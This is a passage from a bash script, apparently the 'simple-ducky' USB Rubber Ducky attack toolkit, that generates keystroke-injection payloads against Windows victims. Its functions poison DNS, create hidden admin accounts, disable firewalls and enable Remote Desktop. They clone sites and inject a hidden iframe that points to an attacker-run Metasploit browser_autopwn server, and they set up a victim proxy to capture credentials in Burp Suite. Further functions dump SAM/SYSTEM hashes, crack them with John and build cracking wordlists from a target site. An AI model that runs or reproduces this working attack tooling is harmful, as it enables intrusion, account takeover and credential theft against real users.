	sleep 3
	x-terminal-emulator -e msfcli auxiliary/server/browser_autopwn LHOST=$attackerip LPORT=$attackerport SRVPORT=8080 SRVHOST=0.0.0.0 URIPATH=/duck E &
	clear
	read -p "Would you like to return to the main menu [y/n]? " option
	xdg-open /usr/share/simple-ducky/ &
	clear

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# Local DNS Poisoning | Browser_Autopwn w/o UAC (Win Vista/7)
#################################################################################
f_autopwnlocaldnsVIS7nouac(){
	clear
	echo -e "\e[1;31mDiscription:\e[0m This payload is designed to setup local DNS poisioning on the victims machine. This payload uses Metasploit's Browser_Autopwn Auxilary module along with an evil iframe to perform the attack. In addition to the DNS poisoning this attack; creates an admin account, hides the admin account, drops the firewall, enables Remote Desktop & Remote Assistance."
	echo -e "\e[1;31mNote:\e[0m Not all websites like to be cloned using this method (wget)... Browser_autopwn is a finicky method to exploit browsers. If the victim's browser and computer are fully patched this method will likely fail."
	echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 with UAC disabled"
	echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit) | props to ashbreeze96 and overwraith for the original concept"
	echo ""
	echo ""
	echo -e "\e[1;34mLet's start with the inject.bin file...\e[0m"
	echo ""
	read -p "What would you like the username to be for your admin account? " attackeruser
	echo ""
	read -p "What would you like the password to be for your admin account? " attackerpass
	echo ""
	read -p "What is the IP address of your attacking webserver? " attackerip
	echo ""
	read -p "What what website do you plan on spoofing (Don't use the FQDN)(example: example.com)? " attackerdomain
	echo -e ""
	read -p "Where do you want me to send your shell? " attackerip
	echo ""
	read -p "What port will you be listening on? " attackerport
	echo ""
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	clear
	echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m"
	echo ""
	sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payloads/autopwnlocaldnsVIS7nouac.conf > /usr/share/simple-ducky/payload_del.txt
	sed "/STRING/s/attackerpass/$attackerpass/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload_del2.txt
	sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload_del3.txt
	sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payload_del3.txt > /usr/share/simple-ducky/payload_del4.txt
	sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payload_del4.txt > /usr/share/simple-ducky/payload_del5.txt
	sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payload_del5.txt > /usr/share/simple-ducky/payload_del6.txt
	sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payload_del6.txt > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del.txt
	rm /usr/share/simple-ducky/payload_del2.txt
	rm /usr/share/simple-ducky/payload_del3.txt
	rm /usr/share/simple-ducky/payload_del4.txt
	rm /usr/share/simple-ducky/payload_del5.txt
	rm /usr/share/simple-ducky/payload_del6.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
    function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	echo -e "\e[1;34mLet's clone a website...\e[0m"
	echo ""
	read -p "What's the FQDN that you would like to clone (example: https://www.example.com)? " attackerfqdn
	echo -e ""
	clear
	rm index.html
	clear
	rm /var/www/index.html
	clear
	echo -e "\e[1;34mCloning $attackerfqdn and injecting an evil iframe...\e[0m"
	echo ""
	sleep 2
	wget $attackerfqdn
	echo "<iframe src="http://$attackerip:8080/duck" width="0" height="0">" >> index.html
	cp index.html /var/www/index.html
	rm index.html
	clear
	echo -e "\e[1;34mRestarting your Apache Server...\e[0m"
	echo ""
	sleep 2
	service apache2 restart
	echo ""
	echo -e "\e[1;34mDone!\e[0m"
	sleep 2
	clear
	echo -e "\e[1;34mLaunching Metasploit's Browser_Autopwn auxilary module...\e[0m"
	echo ""
	sleep 3
	x-terminal-emulator -e msfcli auxiliary/server/browser_autopwn LHOST=$attackerip LPORT=$attackerport SRVPORT=8080 SRVHOST=0.0.0.0 URIPATH=/duck E &
	clear
	read -p "Would you like to return to the main menu [y/n]? " option
	xdg-open /usr/share/simple-ducky/ &
	clear

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# Local DNS Poisoning | Browser_Autopwn w/UAC (Windows 8)
#################################################################################
f_autopwnlocaldnsWIN8uac(){
	clear
	echo -e "\e[1;31mDiscription:\e[0m This payload is designed to setup local DNS poisioning on the victims machine. This payload uses Metasploit's Browser_Autopwn Auxilary module along with an evil iframe to perform the attack. In addition to the DNS poisoning this attack; creates an admin account, hides the admin account, drops the firewall, enables Remote Desktop & Remote Assistance."
	echo -e "\e[1;31mNote:\e[0m Not all websites like to be cloned using this method (wget)... Browser_autopwn is a finicky method to exploit browsers. If the victim's browser and computer are fully patched this method will likely fail."
	echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 with UAC enabled"
	echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit) | props to ashbreeze96 and overwraith for the original concept"
	echo ""
	echo ""
	echo -e "\e[1;34mLet's start with the inject.bin file...\e[0m"
	echo ""
	read -p "What would you like the username to be for your admin account? " attackeruser
	echo ""
	read -p "What would you like the password to be for your admin account? " attackerpass
	echo ""
	read -p "What is the IP address of your attacking webserver? " attackerip
	echo ""
	read -p "What what website do you plan on spoofing (Don't use the FQDN)(example: example.com)? " attackerdomain
	echo -e ""
	read -p "Where do you want me to send your shell? " attackerip
	echo ""
	read -p "What port will you be listening on? " attackerport
	echo ""
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	clear
	echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m"
	echo ""
	sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payloads/autopwnlocaldnsWIN8uac.conf > /usr/share/simple-ducky/payload_del.txt
	sed "/STRING/s/attackerpass/$attackerpass/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload_del2.txt
	sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload_del3.txt
	sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payload_del3.txt > /usr/share/simple-ducky/payload_del4.txt
	sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payload_del4.txt > /usr/share/simple-ducky/payload_del5.txt
	sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payload_del5.txt > /usr/share/simple-ducky/payload_del6.txt
	sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payload_del6.txt > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del.txt
	rm /usr/share/simple-ducky/payload_del2.txt
	rm /usr/share/simple-ducky/payload_del3.txt
	rm /usr/share/simple-ducky/payload_del4.txt
	rm /usr/share/simple-ducky/payload_del5.txt
	rm /usr/share/simple-ducky/payload_del6.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
		function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	echo -e "\e[1;34mLet's clone a website...\e[0m"
	echo ""
	read -p "What's the FQDN that you would like to clone (example: https://www.example.com)? " attackerfqdn
	echo -e ""
	clear
	rm index.html
	clear
	rm /var/www/index.html
	clear
	echo -e "\e[1;34mCloning $attackerfqdn and injecting an evil iframe...\e[0m"
	echo ""
	sleep 2
	wget $attackerfqdn
	echo "<iframe src="http://$attackerip:8080/duck" width="0" height="0">" >> index.html
	cp index.html /var/www/index.html
	rm index.html
	clear
	echo -e "\e[1;34mRestarting your Apache Server...\e[0m"
	echo ""
	sleep 2
	service apache2 restart
	echo ""
	echo -e "\e[1;34mDone!\e[0m"
	sleep 2
	clear
	echo -e "\e[1;34mLaunching Metasploit's Browser_Autopwn auxilary module...\e[0m"
	echo ""
	sleep 3
	x-terminal-emulator -e msfcli auxiliary/server/browser_autopwn LHOST=$attackerip LPORT=$attackerport SRVPORT=8080 SRVHOST=0.0.0.0 URIPATH=/duck E &
	clear
	read -p "Would you like to return to the main menu [y/n]? " option
	xdg-open /usr/share/simple-ducky/ &
	clear

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# Local DNS Poisoning | Browser_Autopwn w/o UAC (Windows 8)
#################################################################################
f_autopwnlocaldnsWIN8nouac(){
	clear
	echo -e "\e[1;31mDiscription:\e[0m This payload is designed to setup local DNS poisioning on the victims machine. This payload uses Metasploit's Browser_Autopwn Auxilary module along with an evil iframe to perform the attack. In addition to the DNS poisoning this attack; creates an admin account, hides the admin account, drops the firewall, enables Remote Desktop & Remote Assistance."
	echo -e "\e[1;31mNote:\e[0m Not all websites like to be cloned using this method (wget)... Browser_autopwn is a finicky method to exploit browsers. If the victim's browser and computer are fully patched this method will likely fail."
	echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 with UAC enabled"
	echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit) | props to ashbreeze96 and overwraith for the original concept"
	echo ""
	echo ""
	echo -e "\e[1;34mLet's start with the inject.bin file...\e[0m"
	echo ""
	read -p "What would you like the username to be for your admin account? " attackeruser
	echo ""
	read -p "What would you like the password to be for your admin account? " attackerpass
	echo ""
	read -p "What is the IP address of your attacking webserver? " attackerip
	echo ""
	read -p "What what website do you plan on spoofing (Don't use the FQDN)(example: example.com)? " attackerdomain
	echo -e ""
	read -p "Where do you want me to send your shell? " attackerip
	echo ""
	read -p "What port will you be listening on? " attackerport
	echo ""
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	clear
	echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m"
	echo ""
	sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payloads/autopwnlocaldnsWIN8nouac.conf > /usr/share/simple-ducky/payload_del.txt
	sed "/STRING/s/attackerpass/$attackerpass/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload_del2.txt
	sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload_del3.txt
	sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payload_del3.txt > /usr/share/simple-ducky/payload_del4.txt
	sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payload_del4.txt > /usr/share/simple-ducky/payload_del5.txt
	sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payload_del5.txt > /usr/share/simple-ducky/payload_del6.txt
	sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payload_del6.txt > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del.txt
	rm /usr/share/simple-ducky/payload_del2.txt
	rm /usr/share/simple-ducky/payload_del3.txt
	rm /usr/share/simple-ducky/payload_del4.txt
	rm /usr/share/simple-ducky/payload_del5.txt
	rm /usr/share/simple-ducky/payload_del6.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
    function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	echo -e "\e[1;34mLet's clone a website...\e[0m"
	echo ""
	read -p "What's the FQDN that you would like to clone (example: https://www.example.com)? " attackerfqdn
	echo -e ""
	clear
	rm index.html
	clear
	rm /var/www/index.html
	clear
	echo -e "\e[1;34mCloning $attackerfqdn and injecting an evil iframe...\e[0m"
	echo ""
	sleep 2
	wget $attackerfqdn
	echo "<iframe src="http://$attackerip:8080/duck" width="0" height="0">" >> index.html
	cp index.html /var/www/index.html
	rm index.html
	clear
	echo -e "\e[1;34mRestarting your Apache Server...\e[0m"
	echo ""
	sleep 2
	service apache2 restart
	echo ""
	echo -e "\e[1;34mDone!\e[0m"
	sleep 2
	clear
	echo -e "\e[1;34mLaunching Metasploit's Browser_Autopwn auxilary module...\e[0m"
	echo ""
	sleep 3
	x-terminal-emulator -e msfcli auxiliary/server/browser_autopwn LHOST=$attackerip LPORT=$attackerport SRVPORT=8080 SRVHOST=0.0.0.0 URIPATH=/duck E &
	clear
	read -p "Would you like to return to the main menu [y/n]? " option
	xdg-open /usr/share/simple-ducky/ &
	clear

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# Proxy in the Middle (PiTM) | no admin needed (Win XP/Vista/7)
#################################################################################
f_proxyinthemiddleXPVIS7(){
	clear
	echo -e "\e[1;31mDiscription:\e[0m This payload sets up a proxy server on the vicitims machine. It then launches Burpsuite and allows the attacker to see everything that the victim browses to and it will even hand over the credentials to any website visited."
	echo -e "\e[1;31mNote:\e[0m This payload does not require any admin access. Although, some corporate networks man have policies in place to block normal users from altering the proxy settings."
	echo -e "\e[1;31mTarget:\e[0m Windows Vista/7"
	echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit)"
	echo ""
	echo ""
	read -p "What IP/domain would you like to use for your proxy server? " attackerip
	echo ""
	read -p "What port will you be using for your proxy server (example: 8081)? " attackerport
	echo ""
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	clear
	echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m"
	echo ""
	sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payloads/proxyinthemiddleXPVIS7.conf > /usr/share/simple-ducky/payload_del.txt
	sed "/STRING/s/attackerport/$attackerport/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
    function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	echo -e "\e[1;34mLaunching Burp Suite...\e[0m"
	echo ""
	sleep 2
	x-terminal-emulator -e java -jar -Xmx1024m /usr/bin/burpsuite.jar &
	clear
	echo -e "\e[1;34mSet the following options in Burp Suite...\e[0m"
	echo ""
	sleep 2
	echo ""
	echo '1) Select the "Proxy" tab'
	echo ""
	echo '2) Under "Intercept" ensure that "Intercept is off"'
	echo ""
	echo '3) Select the "Options" tab under "Proxy"'
	echo ""
	echo "4) Under "Proxy Listeners" select "Add" to add a new listener"
	echo ""
	echo "5) In the "Bind to port:" radio box put $attackerport"
	echo ""
	echo "6) Click the "Specific address:" radio button and select $attackerip / the attacking machines IP address"
	echo ""
	echo "7) Select the "History" tab to view the traffic from the victims machine"
	echo ""
	read -p "Press any key to contiue" enter
	xdg-open /usr/share/simple-ducky/ &
	clear
	read -p "Would you like to return to the main menu [y/n]? " option
	clear

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# Proxy in the Middle (PiTM) | no admin needed (Windows 8)
#################################################################################
f_proxyinthemiddleWIN8(){
	clear
	echo -e "\e[1;31mDiscription:\e[0m This payload sets up a proxy server on the vicitims machine. It then launches Burpsuite and allows the attacker to see everything that the victim browses to and it will even hand over the credentials to any website visited."
	echo -e "\e[1;31mNote:\e[0m This payload does not require any admin access. Although, some corporate networks man have policies in place to block normal users from altering the proxy settings."
	echo -e "\e[1;31mTarget:\e[0m Windows 8"
	echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit)"
	echo ""
	echo ""
	read -p "What IP/domain would you like to use for your proxy server? " attackerip
	echo ""
	read -p "What port will you be using for your proxy server (example: 8081)? " attackerport
	echo ""
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	clear
	echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m"
	echo ""
	sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payloads/proxyinthemiddleWIN8.conf > /usr/share/simple-ducky/payload_del.txt
	sed "/STRING/s/attackerport/$attackerport/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
	function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	echo -e "\e[1;34mLaunching Burp Suite...\e[0m"
	echo ""
	sleep 2
	x-terminal-emulator -e java -jar -Xmx1024m /usr/bin/burpsuite.jar &
	clear
	echo -e "\e[1;34mSet the following options in Burp Suite...\e[0m"
	echo ""
	sleep 2
	echo ""
	echo '1) Select the "Proxy" tab'
	echo ""
	echo '2) Under "Intercept" ensure that "Intercept is off"'
	echo ""
	echo '3) Select the "Options" tab under "Proxy"'
	echo ""
	echo '4) Under "Proxy Listeners" select "Add" to add a new listener'
	echo ""
	echo "5) In the "Bind to port:" radio box put $attackerport"
	echo ""
	echo "6) Click the "Specific address:" radio button and select $attackerip / the attacking machines IP address"
	echo ""
	echo '7) Select the "History" tab to view the traffic from the victims machine'
	echo ""
	read -p "Press any key to contiue" enter
	xdg-open /usr/share/simple-ducky/ &
	clear
	read -p "Would you like to return to the main menu [y/n]? " option
	clear

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
#################################################################################
#
# Misc Options (Cleanup, JAVA update & Password Hasher)
#
#################################################################################
#################################################################################

#################################################################################
# Directoy Cleanup
#################################################################################
f_cleanup(){
	clear
	echo -e "\e[1;34mRemoving old files..."
	sleep 1
	rm *.txt
	rm *.bin
	rm *.html
	clear
	echo -e "\e[1;34mDone! Returning to the main menu."
	sleep 2
	simple-ducky
}

#################################################################################
# FTP Server Setup
#################################################################################
f_ftpsetup(){
	clear
	echo -e "\e[1;34mWhat would you like to do?\e[0m"
	echo ""
	echo "1. Initial Pure-FTPD setup"
	echo "2. Add a new user to the server"
	echo ""
	echo ""
	echo -e "\e[1;31mNote:\e[0m The initial setup is done during the installation process."
	echo ""
	read -p "Option: " option

	if [ "$option" == "1" ]; then
		clear
		echo -e "\e[1;34mLets start setting up your pure-ftpd server\e[0m"
		echo ""
		read -p "[-] Who would you like the primary user to be? " ftpusername
		echo ""
		echo -e "\e[1;33m[-] Configuring pure-FTPD for: $ftpusername\e[0m"
		echo ""
		sleep 3
		groupadd ftpgroup
		useradd -g ftpgroup -d /dev/null -s /etc ftpuser
		echo -e "\e[1;33m[-] Please set the password for $ftpusername.\e[0m"
		pure-pw useradd $ftpusername -u ftpuser -d /ftphome
		pure-pw mkdb
		cd /etc/pure-ftpd/auth/
		ln -s ../conf/PureDB 60pdb
		echo ""
		echo -e "\e[1;33m[-] Creating your home directory, it will reside at /ftphome/\e[0m"
		echo ""
		sleep 3
		mkdir /ftphome
		chown -R ftpuser:ftpgroup /ftphome/
		echo -e "\e[1;33m[-] Starting the FTP server.\e[0m"
		echo ""
		sleep 2
		service pure-ftpd restart
		echo ""
		echo -e "\e[1;32m[+] Done! To test your new account, in a new terminal type: ftp 127.0.0.1\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		read -p "Who would you like to add to the FTP server? " ftpusername
		pure-pw useradd $ftpusername -u ftpuser -d /ftphome
		pure-pw mkdb
		echo ""
		echo -e "\e[1;34mRestarting the FTP server.\e[0m"
		echo ""
		sleep 3
		service pure-ftpd restart
		clear
		echo -e "\e[1;34mDone! To test your new account, in a new terminal type: ftp 127.0.0.1\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
		simple-ducky
	fi
}

#################################################################################
# LM/NTLM Password Hasher
#################################################################################
f_lmntlmhasher(){
	clear
	echo -e "\e[1;31mDescription:\e[0m LM/NTLM Password Hasher..."
	echo -e "\e[1;31mNote:\e[0m If you used the 'LM/NTLM Hash Dump From Live System' payload make sure you extract the .zip files first."
	echo ""
	echo ""
	read -p "Would you like me to extract the encrypted zip files [y|n]? " extract
	echo ""
	if [ "$extract" == "y" ]; then
		read -p "What is the password for the encrypted zip files? " zippass
		echo ""
	else
		echo ""
	fi
	echo "What is the path of the SAM & SYSTEM files, make sure you specify the complete path?"
	echo ""
	read -p "[Example: /ftphome/ (default ftp directory) or /root/Desktop/] " hashpath
	clear
	if [ "$extract" == "y" ]; then
		echo -e "\e[1;34mExtracting the zip files...\e[0m"
		sleep 3
		echo ""
		cd $hashpath
		7za x SAM.zip -p$zippass
		7za x SYSTEM.zip -p$zippass
		7za x ntds.zip -p$zippass
		echo ""
	else
		echo ""
	fi
	echo -e "\e[1;34mMerging the SAM & SYSTEM files\e[0m"
	sleep 3
	echo ""
	cd $hashpath
	bkhive SYSTEM pass.txt
	samdump2 SAM pass.txt > hash.txt
	rm pass.txt
	echo ""
	clear
	echo -e "\e[1;34mDone! Here's your LM/NTLM hashes...\e[0m"
	echo ""
	cat hash.txt
	echo ""
	echo -e "\e[1;34mThe fastest way to crack these hashes is with Rainbow Tables...\e[0m"
	echo -e "\e[1;34mOn-line Rainbow Table:\e[0m http://www.md5decrypter.co.uk/ntlm-decrypt.aspx"
	echo ""
	echo -e "\e[1;34mOr if you would like, I can launch John to attempt to crack the hashes...\e[0m"
	read -p "Would you like me to launch John [y|n]? " launchjohn
	clear
	if [ "$launchjohn" == "y" ]; then
		x-terminal-emulator -e john hash.txt --format=nt2 &
		read -p "Would you like to return to the main menu [y/n]? " option
	else
		read -p "Would you like to return to the main menu [y/n]? " option
	fi

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# Site2lst Custom Wordlist Builder
#################################################################################
f_site2lst(){
	clear
	echo -e "\e[1;31mSite2Lst Custom Wordlist Builder\e[0m"
	echo "This function clones any website you would like and builds a custom wordlist based on the words extracted."
	echo -e "\e[1;31mOrignal Concept by:\e[0m PaulDotCom"
	echo -e "\e[1;31mPaulDotCom Article:\e[0m http://pauldotcom.com/2008/11/creating-custom-wordlists-for.html"
	echo -e "\e[1;31mScript Assembled by:\e[0m Travis Weathers (skysploit) | skysploit@gmail.com"
	echo ""
	echo -e "\e[1;34mWhere do you want to store the password list?\e[0m"
	echo -e "\e[1;34mDefine the full path [i.e. /root/Desktop or /usr/share/wordlists]\e[0m"
	echo ""
	read -p "Path: " newpath
	echo ""
	echo""
	echo -e "\e[1;34mWhat is the target website [Example: www.example.com]?\e[0m"
	echo""
	read -p "Target Website: " targetsite
	echo ""
	echo""
	echo -e "\e[1;34mHow many levels deep would you like to go [Example: 2 | this will clone the first two directories of the website]?\e[0m"
	echo""
	read -p "Number of directories: " directoryscan
	echo ""
	echo""
	echo -e "\e[1;34mWhat would you like to name the wordlist [Example: example.lst]?\e[0m"
	echo ""
	read -p "Wordlist name: " lstname
	echo""
	echo -e "\e[1;34mWould you like to merge your password list with the default John the Ripper list?\e[0m"
	echo""
	read -p "[y|n]: " mergelst
	clear
	mkdir $newpath/wordlist/
	cd $newpath/wordlist/
	clear
	echo -e "\e[1;34m[+] Cloning $targetsite, this may take a while...\e[0m"
	sleep 3
	echo ""
	wget -r -l $directoryscan $targetsite
	echo ""
	echo -e "\e[1;32m[+] The cloning process has finished.\e[0m"
	sleep 3
	clear
	echo -e "\e[1;34m[+] Replacing spaces with new line characters to produce a unique list...\e[0m"
	sleep 3
	grep -hr "" $targetsite/ | tr '[:space:]' '\n' | sort | uniq > wordlist.lst
	echo ""
	echo ""
	echo -e "\e[1;34m[+] Removing odd characters (mainly HTML tags)...\e[0m"
	sleep 3
	egrep -v '('\,'|'\;'|'\}'|'\{'|'\<'|'\>'|'\:'|'\='|'\"'|'\/'|'\/'|'\['|'\]')' wordlist.lst | sort -u > wordlist.clean.lst
	sed 's/[)(]//g' wordlist.clean.lst > wordlist.clean2.lst
	if [ "$mergelst" == "y" ]; then
		echo ""
		echo ""
		echo -e "\e[1;34m[+] Merging our wordlist with the default John the Ripper list....\e[0m"
		sleep 3
		cp /usr/share/john/password.lst password.lst
		cat password.lst >> wordlist.clean2.lst
		rm password.lst
		echo ""
		echo ""
	else
		echo ""
		echo ""
	fi
	echo -e "\e[1;34m[+] Applying some rules and finializing the output...\e[0m"
	sleep 3
	echo""
	john --wordlist=wordlist.clean2.lst --rules --stdout | uniq > $lstname
	echo ""
	echo -e "\e[1;34m[+] Cleaning up our mess...\e[0m"
	sleep 3
	rm wordlist.clean2.lst
	rm wordlist.clean.lst
	rm wordlist.lst
	rm -rf $targetsite/
	echo ""
	echo ""
	echo -e "\e[1;32m[+] Done! your new list is located here: $newpath/wordlist/$lstname\e[0m"
	sleep 3
	nautilus $newpath/wordlist/ &&
	echo ""
	echo ""
	read -p "Press any key to contiue" enter
	clear
	f_mainmenu
}

#################################################################################
#################################################################################
#
# Advanced Features
#
#################################################################################
#################################################################################


#################################################################################
# Advanced Features
#################################################################################
#f_advancebanner(){
#	clear
#	echo -e "\e[1;31mYou have found the advanced menu!\e[0m "
#	echo -e 'This area is designed for advanced users and developers. Consider this area the "beta" testing section of the simple-ducky. From now on this is where all the R&D will happen.'
#	echo -e "If you would like to submit your work for R&D send it to skysploit@gmail.com"
#	echo -e "\e[1;31mNote:\e[0m Have fun with the features while you are here. But please don't share how you got to these features in public forums as I do not have time to discuss the functions and extras that may be in this section."
#	echo -e "\e[1;31mLast R&D Update:\e[0m 13 Jun 2013"
#	echo -e ""
#}

#################################################################################
# Advanced Menu
#################################################################################
#f_advancedmenu(){

#f_advancebanner
#	echo -e "\e[1;34mWhere would you like to start?\e[0m"
#	echo ""
#	echo "1. Durandal Backdoor (Payload only no inject.bin | Works GREAT!)"
#	echo "2. DBD Payload w/inject.bin (NT/SYSTEM Persistent Shell)"
#	echo "3. Custom Payload Builder (Pulls from all the payloads offered by the Simple-Ducky)"
#	echo "4. Install DBD (Required)"
#	echo "5. Return to the Main Menu"
#	echo "6. Quit"
#	echo ""
#	read -p "Option: " option
#
#	case $option in
#	1) f_dbdbuilder ;;
#	2) f_windowsdbdmenu ;;
#	3) f_payloadbuilder ;;
#	4) f_dbdinstaller ;;
#	5) f_mainmenu ;;
#	6) clear;exit ;;
#	*) clear;exit ;;

#	esac

#}

#################################################################################
# DBD Payload Builder
#################################################################################
f_dbdbuilder(){
	clear
